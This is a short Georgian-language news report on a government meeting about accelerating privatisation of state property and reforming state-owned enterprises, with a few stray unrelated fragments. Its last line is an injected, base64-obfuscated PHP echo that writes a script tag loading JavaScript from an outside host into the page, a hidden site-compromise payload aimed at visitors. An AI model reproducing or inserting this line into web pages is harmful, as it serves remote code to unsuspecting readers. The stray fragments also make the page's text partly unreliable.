celsiusi
ავერსი საქკაბელი
საქართველოს პრემიერ-მინისტრმა, გიორგი გახარიამ ეკონომიკური გუნდის წევრებთან მიმდინარე წლის განმავლობაში სახელმწიფო ქონების პრივატიზაციის დაჩქარების გეგმა განიხილა. ამის შესახებ ინფორმაციას მთავრობის ადმინისტრაცია ავრცელებს.
 
მათივე ცნობით, მთავრობის ადმინისტრაციაში გამართულ შეხვედრაზე საუბარი შეეხო სახელმწიფო ქონების, მათ შორის სახელმწიფოს საკუთრებაში არსებული საწარმოების საკითხს.
 
ხაზი გაესვა, რომ სახელმწიფო ქონების აქტიური პრივატიზაცია და ყველა აქტივის რაციონალური გამოყენება კრიტიკულად მნიშვნელოვანია, როგორც ეკონომიკისა და სამუშაო ადგილების სწრაფი აღდგენისთვის, ასევე ქვეყანაში ახალი ინვესტიციების განხორციელების ხელშეწყობისთვის.
 
ასევე აღინიშნა, რომ მთავრობა იწყებს სახელმწიფო საწარმოთა რეფორმას, რომლის მიზანია, სახელმწიფო საწარმოების მართვა იყოს კორპორატიული მართვის საუკეთესო პრაქტიკების და მაგალითების დონეზე. სახელმწიფო საწარმოების მართვის რეფორმირების თვალსაზრისით, ფინანსთა მინისტრ ივანე მაჭავარიანის ხელმძღვანელობით სპეციალური სამუშაო ჯგუფიც შეიქმნა, რომელიც შეიმუშავებს თანმიმდევრული ნაბიჯების კონკრეტულ გეგმას, რათა საბოლოოდ, სახელმწიფო საწარმოების მართვა კორპორატიული მართვის უმაღლეს სტანდარტებს დაუახლოვდეს.
 
2020 წელს პრივატიზების დაჩქარების მიზნით დაწყებული პროექტის “100 საინვესტიციო შეთავაზება ბიზნესს”, ფარგლებში 116 ობიექტი გაიყიდა. შეხვედრაზე განხილული იყო კონკრეტული ნაბიჯები 2021 წელს სახელმწიფო ქონების პრივატიზების უფრო აქტიურად წარმართვისთვის.
 
სამუშაო შეხვედრაში პირველი ვიცე-პრემიერი, რეგიონული განვითარებისა და ინფრასტრუქტურის მინისტრი მაია ცქიტიშვილი, ფინანსთა მინისტრი ივანე მაჭავარიანი და ეკონომიკისა და მდგრადი განვითარების მინისტრი ნათია თურნავა მონაწილეობდნენ.
1430
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");